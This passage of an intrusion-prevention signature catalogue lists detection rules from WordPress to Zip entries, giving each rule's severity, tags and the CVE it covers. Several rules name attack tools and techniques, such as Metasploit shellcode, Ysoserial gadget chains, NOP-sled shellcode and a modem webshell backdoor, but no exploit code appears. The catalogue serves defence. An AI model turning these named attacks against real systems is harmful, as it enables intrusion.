Vulnerability: Word-RTF-Listoverridecount-RCE-CVE-2012-2539
Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761
Description:
Back to top

File-Text_Wordpress-Comment-Content-Filter-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in WordPress Project WordPress detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Wordpress-Comment-Content-Filter-Remote-Code-Execution
Description:
Back to top

File-Text_Wordpress-Download-Manager-Plugin-Package-Settings-Stored-XSS

About this situation: An attempt to exploit a vulnerability in WordPress Project Download Manager Plugin for WordPress detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Vulnerability: Wordpress-Download-Manager-Plugin-Package-Settings-Stored-XSS
Description:
Back to top

File-Text_Wordpress-Forminator-Plugin-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Forminator Plugin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1632-5242
Last changed: sgpkg-ips-1632-5242
Vulnerability: Wordpress-Forminator-Plugin-Reflected-Cross-Site-Scripting
Description:
Back to top

File-Text_Wordpress-Suspicious-JavaScript-Iframe-Injection

About this situation: Obfuscated JavaScript Iframe injection in Wordpress
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-865-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Worldweaver-DX-Studio-Player-Command-Execution

About this situation: An attempt to exploit a Worldweaver DX Studio Player Command Execution vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Worldweaver DX Studio Player, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-725-5211
Vulnerability: Worldweaver-DX-Studio-Player-Command-Execution
Description:
Back to top

File-Text_WScript.Shell-ActiveX-Object-Local-File-Execute

About this situation: Detected a local file execute attempt using WScript.Shell ActiveX object
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2017, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1832-5242
Vulnerability: Local-System-Access-Via-ActiveX-Controls
Microsoft-Outlook-Security-Feature-Bypass-Vulnerability-CVE-2017-11774
Description:
Back to top

File-Text_WScript.Shell-ActiveX-Object-Local-Registry-Access

About this situation: Detected an attempt to access local registry using WScript.Shell ActiveX object
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-630-5211
Vulnerability: Local-System-Access-Via-ActiveX-Controls
Description:
Back to top

File-Text_x86-Unescape-X90nop-Shellcode

About this situation: Shellcode x90 nop detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Text_x86-X41nop-Shellcode

About this situation: Shellcode x41 nop detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-868-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Text_x86-X41nop-Shellcode-2

About this situation: Shellcode x41 nop detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-868-5242
Last changed: sgpkg-ips-868-5242
Description:
Back to top

File-Text_x86-X41nop-Shellcode-With-Host-As-IP

About this situation: Shellcode x41 nop detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-868-5242
Last changed: sgpkg-ips-868-5242
Description:
Back to top

File-Text_x86-X90nop-Shellcode

About this situation: Shellcode x90 nop detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Text_Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities

About this situation: An attempt to exploit an XML DTD detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft .NET Framework, Apache Santuario, Apache XML Security for Java, MS2013-10, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Apache-Santuario-Xml-Security-For-Java-Dtd-Denial-Of-Service
Microsoft-.NET-Framework-Xml-Signature-Validation-Entity-Expansion-DOS
Description:
Back to top

File-Text_Xstream-Library-CVE-2020-26217-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in XStream XStream detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, XStream, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Vulnerability: Xstream-Library-CVE-2020-26217-Insecure-Deserialization
Description:
Back to top

File-Text_Xstream-Library-CVE-2020-26258-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in XStream detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, XStream, CVE2020, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Vulnerability: Xstream-Library-CVE-2020-26258-Insecure-Deserialization
Description:
Back to top

File-Text_Xstream-Library-Reflectionconverter-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in XStream detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, XStream, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1180-5242
Vulnerability: Xstream-Library-Reflectionconverter-Insecure-Deserialization
Description:
Back to top

File-Text_Xstream-Unsafe-Deserialization

About this situation: An attempt to exploit a vulnerability in XStream library detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, XStream, CVE2021, CVE2024, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1836-5242
Vulnerability: Xstream-Unsafe-Deserialization
Jenkins-Arbitrary-File-Read-CVE-2024-23897
Xstream-Unsafe-Deserialization-CVE-2021-29505
Description:
Back to top

File-Text_Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Xunlei Thunder detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Xunlei Thunder, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow
Description:
Back to top

File-Text_Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute

About this situation: Attempt to exploit a vulnerability in Web Thunderbolt detected
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Xunlei Thunderbolt, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute
Description:
Back to top

File-Text_Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Xunlei Thunderbolt detected
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Xunlei Thunderbolt, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow
Description:
Back to top

File-Text_Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution

About this situation: Attempt to exploit a vulnerability in Xunlei Thunderbolt detected
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Xunlei Thunderbolt, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-628-5211
Vulnerability: Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution
Description:
Back to top

File-Text_Yahoo!-Messenger-YVerInf-ActiveX-Control-Buffer-Overflows

About this situation: Attempt to exploit a vulnerability in Yahoo! Messenger detected
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Yahoo Messenger, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: Yahoo!-Messenger-YVerInfo.dll-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

File-Text_Yahoo!-Messenger-YWcUpl.WcUpload-ActiveX-Control-Exploit

About this situation: Exploit against the Yahoo! Messenger YWcUpl.WcUpload ActiveX control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Yahoo Messenger, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: Yahoo!-Messenger-Webcam-Upload-ActiveX-Control-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Yahoo!-Messenger-YWcVwr.WcViewer-ActiveX-Control-Exploit

About this situation: Exploit against the Yahoo! Messenger YWcVwr.WcViewer ActiveX control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Yahoo Messenger, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-578-5211
Vulnerability: Yahoo!-Messenger-Webcam-Viewer-ActiveX-Control-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Yahoo! Music Jukebox detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Yahoo! Music Jukebox, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP_Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the Yahoo! Toolbar detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Yahoo! Widgets, Yahoo! Toolbar, Yahoo Messenger, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Yahoo-Toolbar-ActiveX-Control-Denial-Of-Service-CVE-2007-6228

About this situation: An attempt exploit a vulnerability in Yahoo Toolbar detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Yahoo! Toolbar, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-590-5211
Description:
Back to top

File-Text_Your-Freedom-Cgi-Response

About this situation: Detected a HTTP response using CGI protocol from Your Freedom network
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-510-5211
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

File-Text_Your-Freedom-HTTP-Response

About this situation: An HTTP response from Your Freedom network detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-593-5211
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

File-Text_Ysoserial-Generated-DotNet-Serialized-Object

About this situation: .NET serialized object with Ysoserial gadget chain characteristics detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1779-5242
Vulnerability: Ysoserial-Generated-DotNet-Serialized-Object
Description:
Back to top

File-Text_Zabbix-Addrelatedobjects-SQL-Injection-CVE-2024-42327

About this situation: An attempt to exploit a vulnerability in Zabbix detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1819-5242
Last changed: sgpkg-ips-1819-5242
Vulnerability: Zabbix-Addrelatedobjects-SQL-Injection-CVE-2024-42327
Description:
Back to top

File-Text_Zabbix-Server-PDF_Report_creator.go-Arbitrary-File-Read

About this situation: An attempt to exploit a vulnerability in ZABBIX ZABBIX detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Zabbix-Server-PDF_Report_creator.go-Arbitrary-File-Read
Description:
Back to top

File-Text_Zelune-Access

About this situation: Detects Zelune Anonymous Proxy Listing
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Tunneling Protocols
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: Zelune-Anonymous-Proxy-Portal
Description:
Back to top

File-Text_Zenoss-Core-Version-Check-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Zenoss Core detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zenoss Core, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Zenoss-Core-Version-Check-Remote-Code-Execution
Description:
Back to top

File-Text_Zenturi-ProgramChecker-sasatl-ActiveX-Control-Fill-Method

About this situation: Detected attempt to use vulnerable method of sasatl ActiveX component of Zenturi ProgramChecker
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Zenturi ProgramChecker, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Zenturi-ProgramChecker-sasatl-ActiveX-Control-Fill-Method
Description:
Back to top

File-Text_Zenturi-ProgramChecker-sasatl-ActiveX-Control-Scan-Method-BOF

About this situation: Detected attempt to use vulnerable method of sasatl ActiveX component of Zenturi ProgramChecker
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Zenturi ProgramChecker, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Zenturi-ProgramChecker-sasatl-ActiveX-Control-Scan-Method-Buffer-Overflow
Description:
Back to top

File-Text_Zimbra-Collaboration-Autodiscover-Servlet-Xxe

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration Suite
Context: Text File Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2019, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1169-5242
Last changed: sgpkg-ips-1169-5242
Vulnerability: Zimbra-Collaboration-Autodiscover-Servlet-Xxe
Description:
Back to top

File-Text_Zimbra-Collaboration-Classic-Web-Client-Cross-Site-Scripting-CVE-2023-37580

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Vulnerability: Zimbra-Collaboration-Classic-Web-Client-Cross-Site-Scripting-CVE-2023-37580
Description:
Back to top

File-Text_Zoho-Manageengine-ADaudit-Plus-Arbitrary-File-Write-CVE-2021-42847

About this situation: An attempt to exploit a vulnerability in Zoho ManageEngine ADAudit Plus detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADAudit Plus, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1587-5242
Last changed: sgpkg-ips-1587-5242
Vulnerability: Zoho-Manageengine-ADaudit-Plus-Arbitrary-File-Write-CVE-2021-42847
Description:
Back to top

File-Text_Zoho-Manageengine-Applications-Manager-Userconfigurationaction-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Userconfigurationaction-XSS
Description:
Back to top

File-Text_Zoho-Manageengine-Servicedesk-Plus-Custom-Schedules-Arbitrary-Command-Execution

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ServiceDesk Plus detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine ServiceDesk Plus, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Zoho-Manageengine-Servicedesk-Plus-Custom-Schedules-Arbitrary-Command-Execution
Description:
Back to top

File-Text_ZooKeeper-Exhibitor-UI-Command-Injection

About this situation: An attempt to exploit a vulnerability in ZooKeeper Exhibitor
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ZooKeeper Exhibitor, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1321-5242
Vulnerability: ZooKeeper-Exhibitor-UI-Command-Injection
Description:
Back to top

File-Text_Zoom-Linux-Client-Command-Injection-CVE-2017-15049

About this situation: An attempt to exploit a vulnerability in Zoom Linux client detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoom, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1770-5242
Vulnerability: Zoom-Linux-Client-Command-Injection-CVE-2017-15049
Description:
Back to top

File-Text_ZTE-WebShell-Cmd-Backdoor-CVE-2014-2321

About this situation: An attempt to exploit a known backdoor in ZTE cable modems detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ZTE, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Vulnerability: ZTE-WebShell-Cmd-Backdoor-CVE-2014-2321
Description:
Back to top

File-Text_ZyXEL-Undocumented-User-Credentials-CVE-2020-29583

About this situation: An attempt to exploit a vulnerability in ZyXEL detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: ZyXEL-Undocumented-User-Credentials-CVE-2020-29583
Description:
Back to top

File-Zip_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-Zip_Apache-Jetspeed-Portal-Site-Manager-Zip-File-Upload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Jetspeed detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Jetspeed, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-1700-5242
Vulnerability: Apache-Jetspeed-Portal-Site-Manager-Zip-File-Upload-Directory-Traversal
Description:
Back to top

File-Zip_Apache-OpenMeetings-Zip-File-Path-Traversal

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OpenMeetings detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache OpenMeetings, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-750-5211
Vulnerability: Apache-OpenMeetings-Zip-File-Path-Traversal
Description:
Back to top

File-Zip_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386

About this situation: An attempt to exploit a vulnerability in Apache Solr detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Vulnerability: Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
Description:
Back to top

File-Zip_Archive-Detected

About this situation: Detected a download attempt of a zip archive
Context: Zip File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, WinZip, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-557-5211
Vulnerability: Zip-Archive
File-Type-Identification
Description:
Back to top

File-Zip_Conflicting-Content-Type-AVI

About this situation: The file extension reported different file type than was identified
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: VideoLAN-VLC-Renamed-Zip-File-Handling-Code-Execution
Description:
Back to top

File-Zip_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: Zip File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Zip_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: Zip File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Zip_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: Zip File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Zip_Cyberpower-Powerpanel-Business-Import-Profile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in CyberPower PowerPanel Business detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CyberPower PowerPanel Business, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1732-5242
Last changed: sgpkg-ips-1732-5242
Vulnerability: Cyberpower-Powerpanel-Business-Import-Profile-Directory-Traversal
Description:
Back to top

File-Zip_Directory-Traversal-In-Archive-Filename

About this situation: A possibly malicious zip file
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1759-5242
Vulnerability: Directory-Traversal-In-Archive-Filename
Description:
Back to top

File-Zip_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: Zip File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-Zip_Executable-In-Archive

About this situation: Executable file has been detected in zip formatted archive
Context: Zip File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-557-5211
Vulnerability: Executable-File-Transfer
Description:
Back to top

File-Zip_Executable-In-JAR

About this situation: Executable file has been detected in jar file
Context: Zip File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-557-5211
Vulnerability: Executable-File-Transfer
Description:
Back to top

File-Zip_Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in GNU Libextractor detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GNU Libextractor, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1799-5242
Vulnerability: Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read
Description:
Back to top

File-Zip_Ivanti-Avalanche-Extractzipentry-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Ivanti-Avalanche-Extractzipentry-Directory-Traversal
Description:
Back to top

File-Zip_JAR-File-Detected

About this situation: A Java-related file transfer was detected
Context: Zip File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Any Operating System not specific, Possibly Unwanted Content, Program File
First detected in: sgpkg-ips-473-5211
Last changed: sgpkg-ips-1851-5242
Vulnerability: File-Type-Identification
Java-Related-File-Transfers
Description:
Back to top

File-Zip_Lexmark-Markvision-Enterprise-Libraryfileuploadservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Lexmark MarkVision Enterprise detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lexmark MarkVision Enterprise, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-637-5211
Vulnerability: Lexmark-Markvision-Enterprise-Libraryfileuploadservlet-Directory-Traversal
Description:
Back to top

File-Zip_Long-Filename

About this situation: A ZIP file with a very long filename detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1799-5242
Vulnerability: Corel-PDF-Fusion-XPS-Stack-Buffer-Overflow
Description:
Back to top

File-Zip_Manageengine-Servicedesk-File-Upload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ManageEngine ServiceDesk Plus detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine ServiceDesk Plus, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-686-5211
Last changed: sgpkg-ips-1279-5242
Vulnerability: Manageengine-Servicedesk-File-Upload-Directory-Traversal
Description:
Back to top

File-Zip_Metasploit-Shellcode-JAR

About this situation: Metasploit Java shellcode detection
Context: Zip File Stream
Severity: 7
